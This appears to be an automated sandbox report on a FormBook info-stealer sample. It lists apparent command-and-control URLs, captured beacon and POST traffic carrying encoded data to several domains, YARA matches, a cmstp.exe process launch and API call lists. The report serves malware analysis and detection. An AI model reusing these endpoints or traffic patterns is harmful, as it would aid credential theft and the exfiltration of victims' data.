Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.white-hat.uk/u2kb/
Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.white-hat.uk/u2kb/www.white-hat.uk
Source: explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.younrock.com
Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.younrock.com/u2kb/
Source: cmstp.exe, 00000006.00000002.570208700.0000000007150000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.younrock.com/u2kb/?X51Qjm=05tPwqSdqXO2xf32BHQi8E1nUfoFa2c80hhB3sQ3FFDNPs5AZDU6EjUymll22Wm
Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.younrock.com/u2kb/www.younrock.com
Source: HI4NJ046K.6.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: explorer.exe, 00000004.00000002.583702124.0000000015B6E000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 00000006.00000002.569660808.00000000055BE000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://alldomains.hosting/
Source: explorer.exe, 00000004.00000002.583702124.0000000015B6E000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 00000006.00000002.569660808.00000000055BE000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://alldomains.hosting/domain-registrieren.html
Source: explorer.exe, 00000004.00000002.583702124.0000000015B6E000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 00000006.00000002.569660808.00000000055BE000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://alldomains.hosting/hosting-webhosting.html
Source: HI4NJ046K.6.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: HI4NJ046K.6.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: cmstp.exe, 00000006.00000003.402261377.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.6.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: HI4NJ046K.6.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: cmstp.exe, 00000006.00000003.402261377.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.6.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: cmstp.exe, 00000006.00000003.402261377.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.6.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: cmstp.exe, 00000006.00000003.402261377.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.6.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: cmstp.exe, 00000006.00000003.402261377.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.6.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: cmstp.exe, 00000006.00000003.402261377.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.6.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: explorer.exe, 00000004.00000002.583702124.00000000159DC000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 00000006.00000002.569660808.000000000542C000.00000004.10000000.00040000.00000000.sdmp, cmstp.exe, 00000006.00000002.570208700.0000000007150000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.name.com/domain/renew/222ambking.org?utm_source=Sedo_parked_page&utm_medium=button&utm_c
Source: cmstp.exe, 00000006.00000002.570208700.0000000007150000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.sedo.com/services/parking.php3
Source: unknown HTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.gritslab.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.gritslab.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.gritslab.com/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 58 35 31 51 6a 6d 3d 28 66 71 54 47 58 66 5f 6b 4e 50 63 28 71 42 41 48 34 79 65 65 47 71 37 51 76 76 30 28 4b 48 6e 55 46 49 79 6f 36 46 44 47 79 4f 78 31 52 43 64 68 42 69 47 5a 54 69 70 36 4d 43 78 41 63 47 79 67 38 32 47 4b 76 51 30 79 71 62 56 46 4d 4f 67 5a 46 52 4d 6a 4a 7e 30 73 66 28 38 7a 79 58 7a 66 6e 39 50 4a 59 77 36 54 47 71 44 36 43 4e 68 44 53 6d 4f 36 4a 42 39 58 68 68 45 7a 70 39 37 45 71 79 67 43 70 6c 45 44 6a 74 62 50 61 61 41 41 54 74 76 34 66 34 75 37 70 38 65 72 6f 7a 68 36 48 6d 6e 73 54 38 5f 67 6a 6b 49 4a 41 62 6a 6e 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: X51Qjm=(fqTGXf_kNPc(qBAH4yeeGq7Qvv0(KHnUFIyo6FDGyOx1RCdhBiGZTip6MCxAcGyg82GKvQ0yqbVFMOgZFRMjJ~0sf(8zyXzfn9PJYw6TGqD6CNhDSmO6JB9XhhEzp97EqygCplEDjtbPaaAATtv4f4u7p8erozh6HmnsT8_gjkIJAbjng).
Source: unknown DNS traffic detected: queries for: www.white-hat.uk
Source: global traffic HTTP traffic detected: GET /u2kb/?X51Qjm=PXfMycAZpTAipct8YsIgv6PR3Y11yPgF2k7967nf/qU1A0mUqq9Jy2mfr4kURdfD0IyZUuXLnrTzZCke5/3g9z1JjJjKyNNZNw==&w6DN_=E0EQSM0RCb349p HTTP/1.1Host: www.white-hat.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?X51Qjm=ydCzFiH7iMWnz6xHMre3IWaEcfnK5+fYQUsmgPEoYCSsyD6HgT3yZXCBsea1O+OKnOGwPNRrrKn2ANadQmZuoq3zmdf3x1nRXg==&w6DN_=E0EQSM0RCb349p HTTP/1.1Host: www.gritslab.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?X51Qjm=rr+sOBvEXsBdGevUkZEAvniGWrNxzC1YNHmXivr92FQhRIIYsedRhL+YGaN2VCieGtjtLTUTzUqxDX3Wf7WovfMRM9ceCuTm3Q==&w6DN_=E0EQSM0RCb349p HTTP/1.1Host: www.bitservicesltd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?X51Qjm=IEUpLmGg2fqLmrhwDd0CH8vm0i8ubOQDFcodV2ACJcW4bHSQscR3aN4MRDv2q1O0g2vnwuasF99orDvyVUehJPYRcFQEZ60O6g==&w6DN_=E0EQSM0RCb349p HTTP/1.1Host: www.222ambking.orgConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?X51Qjm=IK59b/MdFRha+CUVMWpzDpHQ2riuD6F66TLC1fPPNwLnZq29gpb12AWvlZbo17UEh0sBgFvevrMQsuZfYKuAI0Y2tVIkdALeFw==&w6DN_=E0EQSM0RCb349p HTTP/1.1Host: www.energyservicestation.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?X51Qjm=05tPwqSdqXO2xf32BHQi8E1nUfoFa2c80hhB3sQ3FFDNPs5AZDU6EjUymll22Wm6Scj5xbzg3GdXyuHgSKqxyFLAdmHecJKz/g==&w6DN_=E0EQSM0RCb349p HTTP/1.1Host: www.younrock.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?X51Qjm=pn+zaWXo7szcfRSxpZYFMSllMpP2ulP+x3705F5u21IqvN9WG9kcUa2nxvPm1UX5MTo8dUhpuHauDgBRPTa20dSRfVLCBC+wQQ==&w6DN_=E0EQSM0RCb349p HTTP/1.1Host: www.thewildphotographer.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?X51Qjm=Yd5Rzn4EVOpL1Cl/e5Amzdaa+E7UlYBpl8BtE0ZhlgLGbR5cH1Fns9iDSFPM0EqDoX1il4mP+EMsdt2zebBg7FEeCQ3NU/ifUg==&w6DN_=E0EQSM0RCb349p HTTP/1.1Host: www.shapshit.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?X51Qjm=im5SXjRwbJIZeY2yeMVWNNnKg99Etck2UhYi2fNZ2Kf/X7lq2SPR1Q6pROq8Gck3yLtOH/fXnE++yuD9U7pvtIMkBqNJDo2oag==&w6DN_=E0EQSM0RCb349p HTTP/1.1Host: www.thedivinerudraksha.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Creates a DirectInput object (often for capturing keystrokes)
Source: mcwfy.exe, 00000001.00000002.314796170.000000000067A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\u8QPnVhq0N.exe Code function: 0_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_00405809

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 3.2.mcwfy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.mcwfy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.361208868.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.361529431.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.361277802.0000000000540000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.566668495.0000000000550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.567494212.0000000000B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.567601687.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 3.2.mcwfy.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.mcwfy.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.mcwfy.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.mcwfy.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.361208868.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.361208868.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.361529431.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.361529431.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.361277802.0000000000540000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.361277802.0000000000540000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.566668495.0000000000550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.566668495.0000000000550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.567494212.0000000000B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.567494212.0000000000B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.567601687.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.567601687.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Uses 32bit PE files
Source: u8QPnVhq0N.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Uses a Windows Living Off The Land Binaries (LOL bins)
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe Jump to behavior
Yara signature match
Source: 3.2.mcwfy.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.mcwfy.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.mcwfy.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.mcwfy.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.361208868.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.361208868.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.361529431.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.361529431.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.361277802.0000000000540000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.361277802.0000000000540000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.566668495.0000000000550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.566668495.0000000000550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.567494212.0000000000B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.567494212.0000000000B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.567601687.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.567601687.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\u8QPnVhq0N.exe Code function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403640
Detected potential crypto function
Source: C:\Users\user\Desktop\u8QPnVhq0N.exe Code function: 0_2_00406D5F 0_2_00406D5F
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 1_2_00410331 1_2_00410331
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 1_2_020608B7 1_2_020608B7
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 1_2_02060A3B 1_2_02060A3B
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_0040C043 3_2_0040C043
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00405873 3_2_00405873
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00401824 3_2_00401824
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00401830 3_2_00401830
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_0040C03E 3_2_0040C03E
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_004038F3 3_2_004038F3
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00422A4C 3_2_00422A4C
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00401BD0 3_2_00401BD0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00405653 3_2_00405653
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00420753 3_2_00420753
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B420A0 3_2_00B420A0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BE20A8 3_2_00BE20A8
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B2B090 3_2_00B2B090
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BE28EC 3_2_00BE28EC
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B3A830 3_2_00B3A830
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BEE824 3_2_00BEE824
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BD1002 3_2_00BD1002
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B399BF 3_2_00B399BF
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B34120 3_2_00B34120
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B1F900 3_2_00B1F900
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BE22AE 3_2_00BE22AE
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BCFA2B 3_2_00BCFA2B
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B4EBB0 3_2_00B4EBB0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BD03DA 3_2_00BD03DA
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BDDBD2 3_2_00BDDBD2
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BE2B28 3_2_00BE2B28
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B3AB40 3_2_00B3AB40
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B2841F 3_2_00B2841F
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BDD466 3_2_00BDD466
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B42581 3_2_00B42581
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B2D5E0 3_2_00B2D5E0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BE25DD 3_2_00BE25DD
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B10D20 3_2_00B10D20
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BE2D07 3_2_00BE2D07
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BE1D55 3_2_00BE1D55
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BE2EF7 3_2_00BE2EF7
